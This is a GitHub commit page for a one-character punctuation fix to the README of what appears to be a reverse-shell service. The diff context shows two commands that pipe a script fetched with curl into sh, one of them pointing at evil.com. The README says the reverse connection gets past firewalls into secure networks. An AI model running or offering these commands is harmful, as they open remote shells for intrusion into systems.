Skip to content

Commit b30700e

Browse files
committed
Fix punctuation
1 parent a37aa9d commit b30700e

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ curl https://reverse-shell.sh/localhost:1337 | sh
5151

5252
Because this is a reverse connection it can punch through firewalls and connect to the internet.
5353

54-
You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.
54+
You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:
5555

5656
```shell
5757
curl https://reverse-shell.sh/evil.com:1337 | sh

0 commit comments

Comments
 (0)